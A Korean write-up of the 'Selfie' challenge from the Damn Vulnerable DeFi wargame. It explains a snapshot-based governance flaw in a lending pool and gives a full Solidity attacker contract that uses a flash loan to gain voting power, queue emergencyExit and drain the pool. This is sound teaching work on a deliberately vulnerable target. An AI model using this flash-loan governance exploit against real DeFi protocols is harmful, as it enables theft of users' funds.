Damn Vulnerable DiFi

💡Damn Vulnerable DeFi란?
말 그대로 엄청 취약한 DeFi란 뜻 입니다. 작성되어 있는 컨트랙트를 보고 취약점을 분석한 뒤 공격을 위한 컨트랙트나 테스트 코드를 작성해 원하는 결과를 도출하는 일종의 워게임 입니다.

Selfie

---

selfie 문제는 새로 런칭된 DVT Token Lending Pool에서 모든 DVT 토큰을 탈취하는 것 입니다. 해당 Lending Pool은 거버넌스에 의해서 제어되기 때문에 거버넌스와 관련된 취약점을 분석하고 이를 이용해서 모든 토큰을 탈취해야 합니다.

governance: 블록체인에서의 거버넌스(Governance)는 블록체인 네트워크의 운영, 관리, 그리고 네트워크 내에서의 의사결정 구조를 의미합니다. 이는 블록체인 기술이 자율적이고 탈중앙화된 특성을 갖고 있음에도 불구하고, 네트워크의 유지 및 발전을 위해 필수적인 요소입니다.

• SelfiePool: DVT Token에 대한 flashLoan을 실행합니다. 대출을 상환하기 위해서 사용자는 onFlashLoan이라는 대출 상환 인터페이스를 구현해야 합니다. 이전 문제에서도 많이 나온 컨트랙트 구조와 비슷합니다. 해당 pool은 거버넌스에 의해 컨트롤 됩니다.

• SimpleGovernance: 말 그래도 간단하게 구현된 거버넌스이며 사용자가 어떤 액션을 실행할 수 있는지 권한을 검사하고 특정 액션을 실행합니다. 권한은 특정 snapshot에 사용자의 잔액을 검사합니다.

도전과제

---

after(async function () {
    /** SUCCESS CONDITIONS - NO NEED TO CHANGE ANYTHING HERE */

    // Player has taken all tokens from the pool
    expect(await token.balanceOf(player.address)).to.be.equal(TOKENS_IN_POOL);
    expect(await token.balanceOf(pool.address)).to.be.equal(0);
  });

• 공격 실행 후 사용자의 잔액은 Pool에 있던 잔액과 동일해야 합니다.
• pool의 잔액은 0이 되어야 합니다.

SimpleGovernance

---

작동방식

사용자는 원하는 액션을 큐에 저장할 수 있습니다. 이렇게 저장된 액션들은 실행되기 전까지 큐에 남아있으며 사용자가 이 액션을 실행해야만 사라집니다. 액션은 value, target을 지정해 원하는 권한만 있다면 모든 액션을 취할 수 있습니다.

function queueAction(
        address target,
        uint128 value,
        bytes calldata data
    ) external returns (uint256 actionId) {
        if (!_hasEnoughVotes(msg.sender)) revert NotEnoughVotes(msg.sender);

        if (target == address(this)) revert InvalidTarget();

        if (data.length > 0 && target.code.length == 0)
            revert TargetMustHaveCode();

        actionId = _actionCounter;

        _actions[actionId] = GovernanceAction({
            target: target,
            value: value,
            proposedAt: uint64(block.timestamp),
            executedAt: 0,
            data: data
        });

        unchecked {
            _actionCounter++;
        }

        emit ActionQueued(actionId, msg.sender);
    }

큐에 저장되어 있는 액션 실행은 액션을 실행할 수 있을만큼의 충분한 Balance가 있는지 검사만 진행한 후 아래 코드처럼 실행됩니다.

function executeAction(
        uint256 actionId
    ) external payable returns (bytes memory) {
        if (!_canBeExecuted(actionId)) revert CannotExecute(actionId);

        GovernanceAction storage actionToExecute = _actions[actionId];
        actionToExecute.executedAt = uint64(block.timestamp);

        emit ActionExecuted(actionId, msg.sender);

        (bool success, bytes memory returndata) = actionToExecute.target.call{
            value: actionToExecute.value
        }(actionToExecute.data);
        if (!success) {
            if (returndata.length > 0) {
                assembly {
                    revert(add(0x20, returndata), mload(returndata))
                }
            } else {
                revert ActionFailed(actionId);
            }
        }

        return returndata;
    }

액션이 실행할 권한이 있는지는 가장 최근 snapshot의 잔액을 확인해서 토큰의 총 발행량의 50%를 초과하는 지분을 가지고 있다면 실행가능합니다.

function _hasEnoughVotes(address who) private view returns (bool) {
        uint256 balance = _governanceToken.getBalanceAtLastSnapshot(who);
        uint256 halfTotalSupply = _governanceToken
            .getTotalSupplyAtLastSnapshot() / 2;
        return balance > halfTotalSupply;
    }

아마 이런 분류의 문제들을 많이 풀어보신 분들이라면 문제점을 바로 알 수 있으셨을 겁니다.

이렇게 스냅샷에 저장되어 있는 정보들로 어떤 권한이나 자격을 검사할 때 이렇게 아무 조건 없이 가장 최근의 스냅샷을 사용하게 되면 그 순간에만 유지되던 정보들로 인해 잘못된 사람에게 잘못된 권한 부여를 할 수 있게 됩니다.

SelfiePool

---

간단하게 구현된 Lender Pool이지만 이상한 부분이 있습니다.

function emergencyExit(address receiver) external onlyGovernance {
        uint256 amount = token.balanceOf(address(this));
        token.transfer(receiver, amount);

        emit FundsDrained(receiver, amount);
    }

바로 이 부분 입니다. 오직 거버넌스만이 실행할 수 있으며 지정된 receiver에게 해당 컨트랙트의 잔액을 전송해줍니다.

아마 비상 상황시 컨트랙트의 모든 토큰들을 다른 곳으로 옮기려고 있는 기능이지만 악용 가능성이 다분 합니다. receiver를 유동적으로 지정할 수 있기 때문입니다.

Solution

---

저희는 위에서 알아낸 취약점을 이용해서 Pool에 있는 모든 토큰을 탈취 해내야 합니다.

1. FlashLoan에서 Token을 대출 받는다.
2. onFlashLoan이 실행되는 과정에서 대출금을 상환하기 전 DVT Token의 snapshot을 찍는다.
3. 거버넌스의 액션 큐에 receiver를 공격 컨트랙트로 지정해준 뒤 pool의 emergencyExit을 액션으로 추가해 준다.
4. 대출금을 상환하고 공격 큐에 있는 액션을 실행
5. 사용자에게 탈취한 토큰 전송

공격 컨트랙트

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "../selfie/SelfiePool.sol";
import "../selfie/SimpleGovernance.sol";
import "@openzeppelin/contracts/interfaces/IERC3156FlashBorrower.sol";
import "../DamnValuableTokenSnapshot.sol";

contract SelfieAttacker {
    SelfiePool pool;
    IERC3156FlashBorrower borrower;
    SimpleGovernance governance;
    DamnValuableTokenSnapshot DVT;
    address owner;
    uint256 public actionId;
    bytes result;

    constructor(address _pool, address _governance, address _DVT) {
        pool = SelfiePool(_pool);
        borrower = IERC3156FlashBorrower(address(this));
        governance = SimpleGovernance(_governance);
        DVT = DamnValuableTokenSnapshot(_DVT);
        owner = msg.sender;
    }

    function attack() external {
        pool.flashLoan(
            borrower,
            address(DVT),
            DVT.balanceOf(address(pool)),
            ""
        );
    }

    function onFlashLoan(
        address,
        address token,
        uint256 amount,
        uint256 fee,
        bytes calldata
    ) external returns (bytes32) {
        require(token == address(DVT), "Token not supported");
        DVT.snapshot();

        actionId = governance.queueAction(
            address(pool),
            0,
            abi.encodeWithSignature("emergencyExit(address)", address(this))
        );
        DVT.approve(address(pool), amount + fee);
        return keccak256("ERC3156FlashBorrower.onFlashLoan");
    }

    function withdraw() external {
        require(msg.sender == owner, "Not owner");
        result = governance.executeAction(actionId);
        pool.token().transfer(
            msg.sender,
            pool.token().balanceOf(address(this))
        );
    }
}

• 공격 컨트랙트 배포
• FlashLoan 실행
• 블록 time.stamp 조정(스냅샷이 찍히고 일정시간이 지난 뒤로 이동)
• 공격 실행(사용자가 모든 토큰을 받음)

이 순서대로 공격을 실행해 목적을 달성하면 됩니다.

기타 취약점

---

• 중앙집권화된 투표 임계값: _hasEnoughVotes 함수는 사용자가 거버넌스 토큰의 과반수를 소유하고 있어야 액션을 큐에 넣을 수 있도록 합니다. 이는 매우 높은 투표 임계값을 설정하며, 실질적으로 하나의 주체가 과반수의 토큰을 소유하는 경우 전체 네트워크의 거버넌스를 독점할 수 있게 합니다. 이러한 중앙집권화는 블록체인과 탈중앙화의 기본 원칙에 어긋납니다.

• 재진입(reentrancy) 취약점: executeAction 함수에서 외부 컨트랙트에 대한 call을 사용하여 임의의 데이터와 이더를 보낼 수 있습니다. 이 call은 성공 또는 실패 시 특정 조건 없이 실행되므로, 대상 컨트랙트가 재진입 공격을 시도할 수 있는 여지를 제공합니다. 물론, 현재 코드 흐름에서는 실행 후 executedAt 타임스탬프가 설정되므로 재진입 공격이 바로 이어질 가능성은 낮습니다. 그러나 이는 구조적으로 잠재적 위험을 갖고 있습니다.

• 타겟 코드 존재 여부 검증: queueAction 함수는 타겟 주소에 코드가 존재하는지를 확인합니다. 그러나 이는 단순히 코드의 존재만을 확인할 뿐, 해당 코드가 안전하거나 예상대로의 기능을 수행한다는 보장은 없습니다. 이는 악의적인 코드가 거버넌스 시스템을 통해 실행될 수 있음을 의미합니다.

• 시간 조작 가능성: 블록체인에서 block.timestamp (혹은 now)는 블록을 채굴하는 마이너에 의해 조작될 수 있는 값입니다. executeAction에서는 이 타임스탬프를 기준으로 액션의 실행 가능 여부를 판단합니다. 비록 큰 범위의 조작은 어렵지만, 몇 분 내외로 조작이 가능하여 결정적인 상황에서 영향을 미칠 수 있습니다.

• 거버넌스 메커니즘의 투명성 및 유연성 부족: 코드 내에서 고정된 방식(ACTION_DELAY_IN_SECONDS와 hasEnoughVotes)만을 사용하여 거버넌스 결정을 내리므로, 다양한 상황에 유연하게 대처하기 어렵습니다. 또한, 모든 결정과 변경 사항이 공개적이고 투명하게 관리되는지에 대한 구체적인 확인 방법이 부족합니다.